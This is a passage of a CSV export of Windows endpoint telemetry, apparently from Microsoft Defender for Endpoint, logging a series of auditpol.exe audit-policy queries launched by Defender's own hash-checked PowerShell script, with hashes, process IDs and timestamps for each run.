20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+433,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.025561300+00:00,6892,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9217-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.040648600+00:00,2021-06-23 01:15:33.910661200+00:00,147e1c4a-a98e-40f7-9572-27621b8fb5c9,computerpii_0a470890c60768167990033d701e7bd881398861,156812,False,10.7740.19041.1052,False,11540474045172155,,11540474045172197,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+434,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.040275900+00:00,8968,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9249-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.069186700+00:00,2021-06-23 01:15:33.910695900+00:00,29733b75-41a5-4490-b57e-0f9250de1d05,computerpii_0a470890c60768167990033d701e7bd881398861,156813,False,10.7740.19041.1052,False,11540474045172155,,11540474045172198,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+435,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.055751600+00:00,19800,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9216-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.070779600+00:00,2021-06-23 01:15:33.910729200+00:00,f0cc0f00-3e27-4546-af7f-1c6f0fad7508,computerpii_0a470890c60768167990033d701e7bd881398861,156814,False,10.7740.19041.1052,False,11540474045172155,,11540474045172199,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+436,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.072373700+00:00,19396,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9215-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.192043300+00:00,2021-06-23 01:15:33.910865900+00:00,31ad3932-3630-4099-ac7d-175d02e6dd93,computerpii_0a470890c60768167990033d701e7bd881398861,156818,False,10.7740.19041.1052,False,11540474045172155,,11540474045172200,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+437,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.241522600+00:00,10952,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce921c-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.256631400+00:00,2021-06-23 01:15:33.910899100+00:00,320565e0-8486-4ddf-b4b2-1310c6c0f1ea,computerpii_0a470890c60768167990033d701e7bd881398861,156819,False,10.7740.19041.1052,False,11540474045172155,,11540474045172201,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+438,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.257154400+00:00,16448,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce921b-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.276625700+00:00,2021-06-23 01:15:33.910965600+00:00,b699e520-60b3-4c96-8c71-385f432257f3,computerpii_0a470890c60768167990033d701e7bd881398861,156821,False,10.7740.19041.1052,False,11540474045172155,,11540474045172202,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+439,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.271488200+00:00,1872,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9244-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.277351900+00:00,2021-06-23 01:15:33.911000500+00:00,cffff311-03b4-484a-9c78-46e0d92e3ae9,computerpii_0a470890c60768167990033d701e7bd881398861,156822,False,10.7740.19041.1052,False,11540474045172155,,11540474045172203,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+440,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.287006500+00:00,11428,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9224-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:54.300742100+00:00,2021-06-23 01:15:33.911033800+00:00,bfeedfee-5167-4713-9139-8c869aaa6549,computerpii_0a470890c60768167990033d701e7bd881398861,156823,False,10.7740.19041.1052,False,11540474045172155,,11540474045172204,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+441,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:54.301357+00:00,17500,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9227-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { 